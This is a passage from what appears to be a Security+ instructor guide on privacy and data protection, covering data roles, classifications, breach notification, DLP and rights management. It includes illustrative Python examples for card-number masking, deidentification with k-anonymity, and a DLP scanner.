Data must be kept securely within a processing and storage system that enforces CIA attributes. In practice, this will mean a file or database management system that provides read or read/write access to authorized and authenticated accounts or denies access otherwise (by being encrypted, for instance). As distinct from this security requirement, you also need to consider the impact of privacy in shaping data governance.

Teaching Tip: Do not overlook the importance of availability. Make sure students can distinguish security requirements from privacy requirements.

Privacy versus Security
While data security is important, privacy is an equally vital factor. Privacy is a data governance requirement that arises when collecting and processing personal data. Personal data is any information about an identifiable individual person, referred to as the data subject. Where data security controls focus on the CIA attributes of the processing system, privacy requires policies to identify private data, ensure that storage, processing, and retention is compliant with relevant regulations, limit access to the private data to authorized persons only, and ensure the rights of data subjects to review and remove any information held about them are met.

Information Life Cycle Management


An information life cycle model identifies discrete steps to assist security and privacy
policy design. Most models identify the following general stages:


• Creation/collection: data may be generated by an employee or automated system, or it may be submitted by a customer or supplier. At this stage, the data needs to be classified and tagged.
• Distribution/use: data is made available on a need-to-know basis for authorized uses by authenticated account holders and third parties.
• Retention: data might have to be kept in an archive past the date when it is still used, for regulatory reasons.
• Disposal: when it no longer needs to be used or retained, media storing data assets must be sanitized to remove any remnants.

Information management is a massive task in any organization. Most schemes focus on structured data (that is, information that is stored in a directory hierarchy and subject to administrative access controls). Managing and classifying unstructured data (emails, chat sessions, telephone calls, and so on) is an even more daunting task, though software solutions designed to tackle this problem are available.

Data Roles and Responsibilities
A data governance policy describes the security controls that will be applied to protect data at each stage of its life cycle. There are important institutional governance roles for oversight and management of information assets within the life cycle:
• Data owner: a senior (executive) role with ultimate responsibility for maintaining the confidentiality, integrity, and availability of the information asset. The owner is responsible for labeling the asset (such as determining who should have access and determining the asset's criticality and sensitivity) and ensuring that it is protected with appropriate controls (access control, backup, retention, and so forth). The owner also typically selects a steward and custodian and directs their actions and sets the budget and resource allocation for sufficient controls.
• Data steward: this role is primarily responsible for data quality. This involves tasks such as ensuring data is labeled and identified with appropriate metadata and that data is collected and stored in a format and with values that comply with applicable laws and regulations.
• Data custodian: this role handles managing the system on which the data assets are stored. This includes responsibility for enforcing access control, encryption, and backup/recovery measures.
• Data privacy officer: this role is responsible for oversight of any personally identifiable information (PII) assets managed by the company. The privacy officer ensures that the processing, disclosure, and retention of PII complies with legal and regulatory frameworks.

In the context of legislation and regulations protecting personal privacy, the following two institutional roles are important:
• Data controller: the entity responsible for determining why and how data is stored, collected, and used and for ensuring that these purposes and means are lawful. The data controller has ultimate responsibility for privacy breaches, and is not permitted to transfer that responsibility.
• Data processor: an entity engaged by the data controller to assist with technical collection, storage, or analysis tasks. A data processor follows the instructions of a data controller with regard to collection or processing.


Data controller and processor tend to be organizational roles rather than individual ones. For example, if Widget.foo collects personal data to operate a webstore on its own cloud, it is both the data controller and the data processor. If Widget.foo passes aggregate data to Grommet.foo, asking them to run profitability analytics for different customer segments on its AI-backed cloud, Grommet.foo is a data processor acting under the instruction of Widget.foo. Within the Grommet.foo and Widget.foo companies, the data owner might take personal responsibility for the lawful performance of data controller and processor functions.

Data Classifications
Data classification and typing schemas tag data assets so that they can be managed through the information life cycle. A data classification schema is a decision tree for applying one or more tags or labels to each data asset. Many data classification schemas are based on the degree of confidentiality required:
• Public (unclassified): there are no restrictions on viewing the data. Public information presents no risk to an organization if it is disclosed but does present a risk if it is modified or not available.
• Confidential (secret): the information is highly sensitive, for viewing only by approved persons within the owner organization, and possibly by trusted third parties under NDA.
• Critical (top secret): the information is too valuable to allow any risk of its capture. Viewing is severely restricted.

Teaching Tip: Discuss the difficulty of applying classifications in a consistent way. It is best not to create too many categories.

[Figure: Using Microsoft Azure Information Protection to define an automatic document labeling and watermarking policy. (Screenshot used with permission from Microsoft.)]

Another type of classification schema identifies the kind of information asset:
• Proprietary: proprietary information or intellectual property (IP) is information created and owned by the company, typically about the products or services that they make or perform. IP is an obvious target for a company's competitors, and IP in some industries (such as defense or energy) is of interest to foreign governments. IP may also represent a counterfeiting opportunity (movies, music, and books, for instance).
• Private/personal data: information that relates to an individual identity.
• Sensitive: this label is usually used in the context of personal data. Privacy-sensitive information about a person could harm them if made public and could prejudice decisions made about them if referred to by internal procedures. As defined by the EU's General Data Protection Regulation (GDPR), sensitive personal data (the "special categories" of Article 9) includes religious or philosophical beliefs, political opinions, trade union membership, sex life or sexual orientation, racial or ethnic origin, genetic data, biometric data used for identification, and health information (ec.europa.eu/info/law/law-topic/data-protection/reform/rules-business-and-organisations/legal-grounds-processing-data/sensitive-data/what-personal-data-considered-sensitive_en).

Data Types
A type schema applies a more detailed label to data than simple classification.

Personally Identifiable Information (PII)
Personally identifiable information (PII) is data that can be used to identify, contact, or locate an individual. A Social Security Number (SSN) is a good example of PII. Others include name, date of birth, email address, telephone number, street address, biometric data, and so on. Some bits of information, such as a SSN, may be unique; others uniquely identify an individual in combination (for example, full name with birth date and street address).
Some types of information may be PII depending on the context. For example, when someone browses the web using a static IP address, the IP address is PII. An address that is dynamically assigned by the ISP may not be considered PII. PII is often used for password reset mechanisms and to confirm identity over the telephone. For example, PII may be defined as responses to challenge questions, such as "What is your favorite color/pet/movie?" These are the sort of complexities that must be considered when laws are introduced to control the collection and storage of personal data.

Teaching Tip: You should not need to spend too long on this; just make sure students are aware of these categories.

Customer Data
Customer data can be institutional information, but also personal information about the customer's employees, such as sales and technical support contacts. This personal customer data should be treated as PII. Institutional information might be shared under a nondisclosure agreement (NDA), placing contractual obligations on storing and processing it securely.

Health Information
Personal health information (PHI) or protected health information refers to medical and insurance records, plus associated hospital and laboratory test results. PHI may be associated with a specific person or used as an anonymized or deidentified data set for analysis and research. An anonymized data set is one where the identifying data is removed completely. A deidentified set contains codes that allow the subject information to be reconstructed by the data provider.
PHI trades at high values on the black market, making it an attractive target. Criminals seek to exploit the data for insurance fraud or possibly to blackmail victims. PHI data is extremely sensitive and its loss has a permanent effect. Unlike a credit card number or bank account number, it cannot be changed. Consequently, the reputational damage that would be caused by a PHI data breach is huge.

Financial Information
Financial information refers to data held about bank and investment accounts, plus information such as payroll and tax returns. Payment card information comprises the card number (primary account number, or PAN), expiry date, and the three-digit (four-digit on American Express) card verification value (CVV). Cards are also associated with a PIN, but this should never be transmitted to or handled by the merchant. Abuse of the card may also require the holder's name and the address the card is registered to. The Payment Card Industry Data Security Standard (PCI DSS) defines the safe handling and storage of this information (pcisecuritystandards.org/pci_security).
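The card number structure described above is what a data loss prevention rule keys on, and the check that separates a real PAN from any other long digit string is the Luhn mod-10 check digit that every card number carries. The following is an added example written for this guide, not code from the original text or from the PCI Security Standards Council: it scans text for candidate card numbers, keeps only the Luhn-valid ones, and masks them to the first six and last four digits, which is the most PCI DSS v3.2.1 Requirement 3.3 permits to be displayed. The regular expression, the masking format, and the sample log line (built from published test card numbers, not real cards) are this example's own assumptions.

```python
import re

# Candidate card numbers: 13 to 19 digits, optionally separated by single spaces
# or hyphens. An assumption for this example; production DLP rules are tuned per
# card brand (leading digits and length) to cut false positives further.
CANDIDATE_PAN = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def luhn_valid(digits: str) -> bool:
    """Mod-10 check that every real payment card number satisfies.

    Rejects ordinary numbers (order IDs, timestamps) that merely look like a PAN,
    which is what keeps a DLP rule's false-positive rate tolerable.
    """
    total = 0
    double = False
    for ch in reversed(digits):
        d = int(ch)
        if double:
            d *= 2
            if d > 9:
                d -= 9
        total += d
        double = not double
    return total % 10 == 0


def mask_pan(digits: str) -> str:
    """Keep the first six and last four digits, the maximum PCI DSS allows to be shown."""
    if len(digits) <= 10:
        return "X" * len(digits)
    return digits[:6] + "X" * (len(digits) - 10) + digits[-4:]


def find_pans(text: str) -> list:
    """Return every Luhn-valid card number in text, normalised to digits only."""
    found = []
    for m in CANDIDATE_PAN.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_valid(digits):
            found.append(digits)
    return found


def redact_pans(text: str) -> str:
    """Rewrite text with every Luhn-valid PAN masked; other digit runs are untouched."""
    def repl(m):
        digits = re.sub(r"[ -]", "", m.group(0))
        return mask_pan(digits) if luhn_valid(digits) else m.group(0)
    return CANDIDATE_PAN.sub(repl, text)


if __name__ == "__main__":
    # Constructed log line: the order and ref fields are 13- and 16-digit numbers
    # that fail the Luhn check, so only the two test card numbers are reported.
    line = ("order=2024061512345 card=4111 1111 1111 1111 "
            "alt=5555-5555-5555-4444 ref=1234567890123456")
    print(find_pans(line))
    print(redact_pans(line))
```

Running the script shows that the 13-digit order number and the 16-digit reference survive redaction while both card numbers are masked; the Luhn check is what makes that distinction, not the digit count. A real DLP policy would apply the same validation before raising an alert, since a rule that fires on every 16-digit string is quickly ignored by analysts.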

Government Data
Internally, government agencies have complex data collection and processing requirements. In the US, federal laws place certain requirements on institutions that collect and process data about citizens and taxpayers. This data may be shared with companies for analysis under strict agreements to preserve security and privacy.

Privacy Notices and Data Retention
Data owners should be aware of any legal or regulatory issues that impact collection and processing of personal data. The right to privacy, as enacted by regulations such as the EU's General Data Protection Regulation (GDPR), means that personal data cannot be collected, processed, or retained without a lawful basis, which for most commercial collection means the individual's informed consent. GDPR (ico.org.uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-protection-regulation-gdpr) gives data subjects rights to withdraw consent, and to inspect, amend, or erase data held about them.

Privacy Notices
Informed consent means that the data must be collected and processed only for the stated purpose, and that purpose must be clearly described to the user in plain language, not legalese. This consent statement is referred to as a privacy notice. Data collected under that consent statement cannot then be used for any other purpose. For example, if you collect an email address for use as an account ID, you may not send marketing messages to that email address without obtaining separate consent for that discrete purpose. Purpose limitation will also restrict your ability to transfer data to third parties.

Impact Assessments
Tracking consent statements and keeping data usage in compliance with the consent granted is a significant management task. In organizations that process large amounts of personal data, technical tools that perform tagging and cross-referencing of personal data records will be required. A data protection impact assessment (DPIA) is a process designed to identify the risks of collecting and processing personal data in the context of a business workflow or project and to identify mechanisms that mitigate those risks.

Data Retention
Data retention refers to backing up and archiving information assets in order to comply with business policies and/or applicable laws and regulations. To meet compliance and e-discovery requirements, organizations may be legally bound to retain certain types of data for a specified period. This type of requirement will particularly affect financial data and security log data. Conversely, storage limitation principles in privacy legislation may prevent you from retaining personal data for longer than is necessary. This can complicate the inclusion of PII in backups and archives.

Data Sovereignty and Geographical Considerations
Some states and nations may respect data privacy more or less than others; likewise, some nations may disapprove of the nature and content of certain data. They may even be suspicious of security measures such as encryption. When your data is stored or transmitted in other jurisdictions, or when you collect data from citizens in other states or other countries, you may not "own" the data in the same way as you'd expect or like to.

Data Sovereignty
Data sovereignty refers to a jurisdiction preventing or restricting processing and storage from taking place on systems that do not physically reside within that jurisdiction. Data sovereignty may demand certain concessions on your part, such as using location-specific storage facilities in a cloud service.
For example, GDPR protections are extended to any person while they are within EU or EEA (European Economic Area) borders, regardless of their citizenship. Data subjects can consent to allow a transfer, but there must be a meaningful option for them to refuse consent. If the transfer destination jurisdiction does not provide adequate privacy regulations (to a level comparable to GDPR), then contractual safeguards must be given to extend GDPR rights to the data subject. In the US, companies could self-certify that the protections they offer are adequate under the Privacy Shield scheme (privacyshield.gov/Businesses). Note that the Court of Justice of the European Union invalidated Privacy Shield as a transfer mechanism in July 2020 (the Schrems II ruling), so EU-US transfers have since relied on standard contractual clauses and, from July 2023, on the successor EU-US Data Privacy Framework; check which mechanism a provider actually relies on before treating a transfer as lawful.

Geographical Considerations
Geographic access requirements fall into two different scenarios:
• Storage locations might have to be carefully selected to mitigate data sovereignty issues. Most cloud providers allow choice of data centers for processing and storage, ensuring that information is not illegally transferred from a particular privacy jurisdiction without consent.
• Employees needing access from multiple geographic locations. Cloud-based file and database services can apply constraint-based access controls to validate the user's geographic location before authorizing access.

Privacy Breaches and Data Breaches
A data breach occurs when information is read or modified without authorization. "Read" in this sense can mean either seen by a person or transferred to a network or storage media. A data breach is the loss of any type of data, while a privacy breach refers specifically to loss or disclosure of personal and sensitive data.

Teaching Tip: Note that the definition of a breach can be quite narrow. It is important to review legislation and determine precise compliance requirements.

Organizational Consequences
A data or privacy breach can have severe organizational consequences:
• Reputation damage: data breaches cause widespread negative publicity, and customers are less likely to trust a company that cannot secure its information assets.
• Identity theft: if the breached data is exploited to perform identity theft, the data subject may be able to sue for damages.
• Fines: legislation might empower a regulator to levy fines. These can be fixed sum or (in the most serious cases) a percentage of turnover.
• IP theft: loss of company data can lead to loss of revenue. This typically occurs when copyright material (unreleased movies and music tracks) is breached. The loss of patents, designs, trade secrets, and so on to competitors or state actors can also cause commercial losses, especially in overseas markets where IP theft may be difficult to remedy through legal action.

Notifications of Breaches
The requirements for different types of breach are set out in law and/or in regulations. The requirements indicate who must be notified. A data breach can mean the loss or theft of information, the accidental disclosure of information, or the loss or damage of information. Note that there are substantial risks from accidental breaches if effective procedures are not in place. If a database administrator can run a query that shows unredacted credit card numbers, that is a data breach, regardless of whether the query ever leaves the database server.

Escalation
A breach may be detected by technical staff and, if the event is considered minor, there may be a temptation to remediate the system and take no further notification action. This could place the company in legal jeopardy. Any breach of personal data and most breaches of IP should be escalated to senior decision makers and any impacts from legislation and regulation properly considered.

Public Notification and Disclosure
Other than the regulator, notification might need to be made to law enforcement, individuals and third-party companies affected by the breach, and publicly through press or social media channels. For example, the Health Insurance Portability and Accountability Act (HIPAA) sets out reporting requirements in legislation, requiring breach notification to the affected individuals, the Secretary of the Department of Health and Human Services, and, if more than 500 individuals are affected, to the media (hhs.gov/hipaa/for-professionals/breach-notification/index.html). The requirements also set out timescales for when these parties should be notified. For example, under GDPR, notification to the supervisory authority must be made within 72 hours of becoming aware of a breach of personal data (csoonline.com, "How to report a data breach under GDPR"). Regulations will also set out disclosure requirements, or the information that must be provided to each of the affected parties. Disclosure is likely to include a description of what information was breached, details for the main point of contact, likely consequences arising from the breach, and measures taken to mitigate the breach.
GDPR offers stronger protections than most federal and state laws in the US, which tend to focus on industry-specific regulations, narrower definitions of personal data, and fewer rights and protections for data subjects. The passage of the California Consumer Privacy Act (CCPA) has changed the picture for domestic legislation, however (csoonline.com, "California Consumer Privacy Act (CCPA): What you need to know to be compliant").

Data Sharing and Privacy Terms of Agreement
It is important to remember that although one can outsource virtually any service or activity to a third party, one cannot outsource legal accountability for these services or actions. You are ultimately responsible for the services and actions that these third parties take. If they have any access to your data or systems, any security breach in their organization (for example, unauthorized data sharing) is effectively a breach in yours. Issues of security risk awareness, shared duties, and contractual responsibilities can be set out in a formal legal agreement. The following types of agreements are common:
• Service level agreement (SLA): a contractual agreement setting out the detailed terms under which a service is provided. This can include terms for security access controls and risk assessments plus processing requirements for confidential and private data.
• Interconnection security agreement (ISA): ISAs are defined by NIST's Security Guide for Interconnecting Information Technology Systems, SP 800-47 (csrc.nist.gov/publications/detail/sp/800-47/final). Any federal agency interconnecting its IT system to a third party must create an ISA to govern the relationship. An ISA sets out a security risk awareness process and commits the agency and supplier to implementing security controls.
• Nondisclosure agreement (NDA): legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. If the employee or contractor breaks this agreement and does share such information, they may face legal consequences. NDAs are useful because they deter employees and contractors from violating the trust that an employer places in them.
• Data sharing and use agreement: under privacy regulations such as GDPR or HIPAA, personal data can only be collected for a specific purpose. Data sets can be subject to pseudo-anonymization or deidentification to remove personal data, but there are risks of reidentification if combined with other data sources. A data sharing and use agreement is a legal means of mitigating this risk. It can specify terms for the way a data set can be analyzed and proscribe the use of reidentification techniques.
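The distinction drawn in the Health Information section above between a deidentified set (the provider can still reconstruct the subject) and an anonymized set (the link is destroyed), and the reidentification risk that a data sharing and use agreement has to address, can both be shown on a small data set. The following added example is not code from the original text or from any regulator: it deidentifies constructed patient rows with a provider-held HMAC key, anonymizes them by dropping identifiers and coarsening the quasi-identifiers, and measures k-anonymity, the smallest group of rows that share one (birth year, ZIP) combination. The key, the field names, and the rows are assumptions made for the example.

```python
import hmac
import hashlib
from collections import Counter

# Constructed patient rows, not real data. name and mrn are direct identifiers;
# birth_year and zip are quasi-identifiers that can reidentify a person when
# joined with another data set (a voter roll, a breached customer list).
SAMPLE = [
    {"name": "A. Smith", "mrn": "MRN-1001", "birth_year": 1984, "zip": "30301", "diagnosis": "asthma"},
    {"name": "B. Jones", "mrn": "MRN-1002", "birth_year": 1987, "zip": "30302", "diagnosis": "diabetes"},
    {"name": "C. Lee",   "mrn": "MRN-1003", "birth_year": 1975, "zip": "30305", "diagnosis": "asthma"},
    {"name": "D. Ortiz", "mrn": "MRN-1004", "birth_year": 1971, "zip": "30312", "diagnosis": "hypertension"},
]


def pseudonym(key: bytes, mrn: str) -> str:
    """Stable code for a subject, derived with a keyed hash (HMAC-SHA256).

    Only the data provider holds key, so only the provider can regenerate the
    code for a given MRN. A plain SHA-256 of a low-entropy identifier would not
    do: a recipient could hash every plausible MRN and invert the table.
    """
    return hmac.new(key, mrn.encode(), hashlib.sha256).hexdigest()[:16]


def deidentify(key: bytes, rows):
    """Replace direct identifiers with provider-keyed codes.

    Returns the released rows plus the lookup table the provider retains. That
    table is what makes the set deidentified rather than anonymized: the subject
    can be reconstructed, but only by the provider.
    """
    lookup = {}
    released = []
    for r in rows:
        code = pseudonym(key, r["mrn"])
        lookup[code] = r["mrn"]
        released.append({"code": code, "birth_year": r["birth_year"],
                         "zip": r["zip"], "diagnosis": r["diagnosis"]})
    return released, lookup


def anonymize(rows):
    """Remove identifiers completely and coarsen the quasi-identifiers
    (year to decade, ZIP to its 3-digit prefix) so the link cannot be restored."""
    return [{"birth_year": r["birth_year"] // 10 * 10, "zip": r["zip"][:3] + "**",
             "diagnosis": r["diagnosis"]} for r in rows]


def k_anonymity(rows) -> int:
    """Smallest number of rows sharing one (birth_year, zip) combination.

    k == 1 means at least one row is unique on its quasi-identifiers and can be
    reidentified by anyone holding a second data set with those two columns,
    which is exactly the risk a data sharing and use agreement must address.
    """
    groups = Counter((r["birth_year"], r["zip"]) for r in rows)
    return min(groups.values()) if groups else 0


if __name__ == "__main__":
    key = b"provider-secret-key"  # assumed to live in the provider's key store, never shared
    released, lookup = deidentify(key, SAMPLE)
    print("deidentified: k =", k_anonymity(released),
          "| provider maps", released[0]["code"], "->", lookup[released[0]["code"]])
    print("anonymized: k =", k_anonymity(anonymize(SAMPLE)))
```

The deidentified set still has k = 1 because pseudonymizing the MRN does nothing about birth year and ZIP; every row remains unique on those two columns and can be matched against an external list. Only after coarsening does each combination appear at least twice. In practice an agreement would fix the minimum k the recipient must preserve and forbid joining the set with other sources, and the provider would protect the HMAC key and lookup table as PHI in their own right.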


Review Activity:
Privacy and Data Sensitivity Concepts
Answer the following questions:

1. What is the difference between the role of data steward and the role of data custodian?

The data steward role is concerned with the quality of data (format, labeling, normalization, and so on). The data custodian role focuses on the system hosting the data assets and its access control mechanisms.

2. What range of information classifications could you implement in a data labeling project?

One set of tags could indicate the degree of confidentiality (public, confidential/secret, or critical/top secret). Another tagging schema could distinguish proprietary from private/sensitive personal data.

3. What is meant by PII?

Personally identifiable information is any data that could be used to identify, contact, or locate an individual.

4. You are reviewing security and privacy issues relating to a membership database for a hobbyist site with a global audience. The site currently collects account details with no further information. What should be added to be in compliance with data protection regulations?

The site should add a privacy notice explaining the purposes the personal information is collected and used for. The form should provide a means for the user to give explicit and informed consent to this privacy notice.

5. You are preparing a briefing paper for customers on the organizational consequences of data and privacy breaches. You have completed sections for reputation damage, identity theft, and IP theft. Following the CompTIA Security+ objectives, what other section should you add?

Data and privacy breaches can lead legislators or regulators to impose fines. In some cases, these fines can be substantial (calculated as a percentage of turnover).


Topic 16B
Explain Privacy and Data Protection Controls

EXAM OBJECTIVES COVERED
2.1 Explain the importance of security concepts in an enterprise environment
3.2 Given a scenario, implement host or application security solutions
5.5 Explain privacy and sensitive data concepts in relation to security

Teaching Tip: This topic focuses on technical controls for DLP and deidentification.

Policies and procedures are essential for effective data governance, but they can be supported by technical controls too. As a security professional, you need to be aware of the capabilities of data loss prevention (DLP) systems and privacy-enhancing database controls, and how they can be used to protect data anywhere it resides, on hosts, in email systems, or in the cloud.

Data Protection

Show Slide(s): Data Protection

Teaching Tip: Make sure students can distinguish the data states and the different types of
encryption that can be used.

Data stored within a trusted OS can be subject to authorization mechanisms where
the OS mediates access using some type of ACL. The presence of a trusted OS
cannot always be assumed, however. Other data protection mechanisms, notably
encryption, can be used to mitigate the risk that an authorization mechanism can
be countermanded. When deploying a cryptographic system to protect data assets,
consideration must be given to all the ways that information could potentially be
intercepted. This means thinking beyond the simple concept of a data file stored on a
disk. Data can be described as being in one of three states:

• Data at rest—this state means that the data is in some sort of persistent
storage media. Examples of types of data that may be at rest include financial
information stored in databases, archived audiovisual media, operational policies
and other management documents, system configuration data, and more. In this
state, it is usually possible to encrypt the data, using techniques such as whole
disk encryption, database encryption, and file- or folder-level encryption. It is
also possible to apply permissions (access control lists [ACLs]) to ensure only
authorized users can read or modify the data. ACLs can be applied only if access to
the data is fully mediated through a trusted OS.

• Data in transit (or data in motion)—this is the state when data is transmitted over
a network. Examples of types of data that may be in transit include website traffic,
remote access traffic, data being synchronized between cloud repositories, and
more. In this state, data can be protected by a transport encryption protocol, such
as TLS or IPSec.

With data at rest, there is a greater encryption challenge than with data in transit as the
encryption keys must be kept secure for longer. Transport encryption can use ephemeral
(session) keys.

• Data in use (or data in processing)—this is the state when data is present in
volatile memory, such as system RAM or CPU registers and cache. Examples of
types of data that may be in use include documents open in a word processing
application, database data that is currently being modified, event logs being
generated while an operating system is running, and more. When a user works with
data, that data usually needs to be decrypted as it goes from at rest to in use. The
data may stay decrypted for an entire work session, which puts it at risk. However,
trusted execution environment (TEE) mechanisms, such as Intel Software Guard
Extensions (software.intel.com/content/www/us/en/develop/topics/software-guard-extensions/details.html),
are able to encrypt data as it exists in memory, so that an untrusted process cannot
decode the information.

Data Exfiltration

Show Slide(s): Data Exfiltration

In a workplace where mobile devices with huge storage capacity proliferate and high
bandwidth network links are readily available, attempting to prevent the loss of data by
controlling the types of storage devices allowed to connect to PCs and networks can be
impractical. Unauthorized copying or retrieval of data from a system is referred to as
data exfiltration. Data exfiltration attacks are one of the primary means for attackers
to retrieve valuable data, such as personally identifiable information (PII) or payment
information, often destined for later sale on the black market. Data exfiltration can take
place via a wide variety of mechanisms, including:

• Copying the data to removable media or other device with storage, such as a USB
drive, the memory card in a digital camera, or a smartphone.

• Using a network protocol, such as HTTP, FTP, SSH, email, or Instant Messaging (IM)
chat. A sophisticated adversary might use a Remote Access Trojan (RAT) to perform
transfer of data over a nonstandard network port or a packet crafter to transfer
data over a standard port in a nonstandard way. The adversary may also use
encryption to disguise the data being exfiltrated.

• By communicating it orally over a telephone, cell phone, or Voice over IP (VoIP)
network. Cell phone text messaging is another possibility.

• Using a picture or video of the data—if text information is converted to an image
format, it is very difficult for a computer-based detection system to identify the
original information from the image data.

While some of these mechanisms are simple to mitigate through the use of
security tools, others may be much less easily defeated. You can protect data using
mechanisms and security controls that you have examined previously:

• Ensure that all sensitive data is encrypted at rest. If the data is transferred outside
the network, it will be mostly useless to the attacker without the decryption key.

• Create and maintain offsite backups of data that may be targeted for destruction or
ransom.

• Ensure that systems storing or transmitting sensitive data are implementing
access controls. Check to see if access control mechanisms are granting excessive
privileges to certain accounts.

• Restrict the types of network channels that attackers can use to transfer data from
the network to the outside. Disconnect systems storing archived data from the
network.

• Train users about document confidentiality and the use of encryption to store and
transmit data securely. This should also be backed up by HR and auditing policies
that ensure staff are trustworthy.

Even if you apply these policies and controls diligently, there are still risks to data from
insider threats and advanced persistent threat (APT) malware. Consequently, a class of
security control software has been developed to apply access policies directly to data,
rather than just the host or network on which data is located.

Data Loss Prevention

Show Slide(s): Data Loss Prevention

Interaction Opportunity: Refer students to a vendor site for more information about specific
DLP product features and implementation guidelines.

To apply data guardianship policies and procedures, smaller organizations might
classify and type data manually. An organization that creates and collects large
amounts of personal data will usually need to use automated tools to assist with
this task, however. There may also be a requirement to protect valuable intellectual
property (IP) data. Data loss prevention (DLP) products automate the discovery and
classification of data types and enforce rules so that data is not viewed or transferred
without a proper authorization. Such solutions will usually consist of the following
components:

• Policy server—to configure classification, confidentiality, and privacy rules and
policies, log incidents, and compile reports.

• Endpoint agents—to enforce policy on client computers, even when they are not
connected to the network.

• Network agents—to scan communications at network borders and interface with
web and messaging servers to enforce policy.

DLP agents scan content in structured formats, such as a database with a formal access
control model, or unstructured formats, such as email or word processing documents.
A file cracking process is applied to unstructured data to render it in a consistent
scannable format. The transfer of content to removable media, such as USB devices,
or by email, instant messaging, or even social media, can then be blocked if it does
not conform to a predefined policy. Most DLP solutions can extend the protection
mechanisms to cloud storage services, using either a proxy to mediate access or the
cloud service provider's API to perform scanning and policy enforcement.

Creating a DLP policy in Office 365. (Screenshot used with permission from Microsoft.)

Remediation is the action the DLP software takes when it detects a policy violation. The
following remediation mechanisms are typical:

• Alert only—the copying is allowed, but the management system records an incident
and may alert an administrator.

• Block—the user is prevented from copying the original file but retains access to it.
The user may or may not be alerted to the policy violation, but it will be logged as an
incident by the management engine.

• Quarantine—access to the original file is denied to the user (or possibly any user).
This might be accomplished by encrypting the file in place or by moving it to a
quarantine area in the file system.

• Tombstone—the original file is quarantined and replaced with one describing the
policy violation and how the user can release it again.

When it is configured to protect a communications channel such as email, DLP
remediation might take place using client-side or server-side mechanisms. For
example, some DLP solutions prevent the actual attaching of files to the email before it
is sent. Others might scan the email attachments and message contents, and then strip
out certain data or stop the email from reaching its destination.

Some of the leading vendors include McAfee (skyhighnetworks.com/cloud-data-loss-prevention),
Symantec/Broadcom (broadcom.com/products/cyber-security/information-protection/data-loss-prevention),
and Digital Guardian (digitalguardian.com). A DLP and compliance solution is also
available with Microsoft's Office 365 suite
(docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide).
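The scanning and remediation pipeline described in this section can be followed end to end in the Python script below. It is an added example written for this edition, not code from any of the DLP products named above. It assumes a hypothetical policy set of four rules (a Luhn-validated payment card pattern, a US SSN pattern, and two classification markers), reduces the file cracking step to text normalisation, and implements the four remediation actions from the list above; the sample documents it processes are constructed.

```python
"""Minimal DLP content scanner: file cracking, classification rules, and
policy-driven remediation (alert, block, quarantine, tombstone)."""
import re
import unicodedata
from dataclasses import dataclass
from enum import IntEnum
from typing import Callable, Optional


class Action(IntEnum):
    """Remediation actions ordered least to most restrictive, so the most
    restrictive action among several matching rules can be chosen with max()."""
    ALERT = 1
    BLOCK = 2
    QUARANTINE = 3
    TOMBSTONE = 4


@dataclass
class Rule:
    name: str
    pattern: re.Pattern
    action: Action
    validator: Optional[Callable[[str], bool]] = None  # second-stage check on a match


def luhn_valid(number: str) -> bool:
    """Luhn checksum over the digits; cuts false positives on 16-digit strings
    such as order numbers that merely look like a card number."""
    digits = [int(c) for c in re.sub(r"[ -]", "", number)]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


# Hypothetical policy set; a real product loads this from its policy server.
RULES = [
    Rule("payment-card", re.compile(r"\b(?:\d[ -]?){15}\d\b"), Action.BLOCK, luhn_valid),
    Rule("us-ssn", re.compile(r"\b\d{3}-\d{2}-\d{4}\b"), Action.QUARANTINE),
    Rule("confidential-marker", re.compile(r"\bCONFIDENTIAL\b"), Action.ALERT),
    Rule("top-secret-marker", re.compile(r"\bTOP SECRET\b"), Action.TOMBSTONE),
]


def crack(content: str) -> str:
    """File cracking, reduced to text normalisation: fold compatibility forms
    (for example full-width digits) and strip zero-width characters that are
    sometimes inserted to split a match."""
    text = unicodedata.normalize("NFKC", content)
    return re.sub(r"[\u200b\u200c\u200d\ufeff]", "", text)


def scan(content: str) -> list:
    """Return (rule name, matched text) pairs for every policy violation."""
    text = crack(content)
    hits = []
    for rule in RULES:
        for m in rule.pattern.finditer(text):
            if rule.validator is None or rule.validator(m.group(0)):
                hits.append((rule.name, m.group(0)))
    return hits


def remediate(filename: str, content: str) -> dict:
    """Apply the most restrictive action among the matched rules and report
    what the user is left with: the original content, nothing, or a tombstone."""
    hits = scan(content)
    if not hits:
        return {"file": filename, "action": None, "incident": None, "content": content}
    actions = {r.name: r.action for r in RULES}
    action = max(actions[name] for name, _ in hits)
    incident = {"file": filename, "rules": sorted({name for name, _ in hits})}
    result = {"file": filename, "action": action, "incident": incident}
    if action == Action.TOMBSTONE:
        result["content"] = ("This file was quarantined by DLP policy ("
                             + ", ".join(incident["rules"])
                             + "). Contact the security team to request its release.")
    elif action == Action.QUARANTINE:
        result["content"] = None  # moved to the quarantine area; no user access
    else:
        result["content"] = content  # alert or block: the original stays in place
    return result


if __name__ == "__main__":
    # Constructed sample documents; the card number is a published test value.
    for name, doc in [("order.txt", "Paid with card 4111-1111-1111-1111."),
                      ("hr.txt", "Applicant SSN 123-45-6789"),
                      ("plan.txt", "TOP SECRET launch plan")]:
        r = remediate(name, doc)
        print(name, r["action"].name, r["incident"]["rules"])
```

Two design points carry over to real deployments: the validator stage (here a Luhn check) is what keeps a pattern-based rule from flooding the policy server with incidents, and normalisation before matching is what stops trivial evasions such as zero-width characters between digits.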

Rights Management Services

Show Slide(s): Rights Management Services

As another example of data protection and information management solutions,
Microsoft provides an Information Rights Management (IRM) feature in their Office
productivity suite, SharePoint document collaboration services, and Exchange
messaging server. IRM works with the Active Directory Rights Management Services
(RMS) or the cloud-based Azure Information Protection. These technologies provide
administrators with the following functionality:

• Assign file permissions for different document roles, such as author, editor,
or reviewer.

• Restrict printing and forwarding of documents, even when sent as file attachments.

• Restrict printing and forwarding of email messages.

Configuring a rights management template. (Screenshot used with permission from Microsoft.)

Rights management is built into other secure document solutions, such as Adobe
Acrobat.


Privacy Enhancing Technologies

Show Slide(s): Privacy Enhancing Technologies

Teaching Tip: Make sure students can use this terminology correctly.

Data minimization is the principle that data should only be processed and stored if
that is necessary to perform the purpose for which it is collected. In order to prove
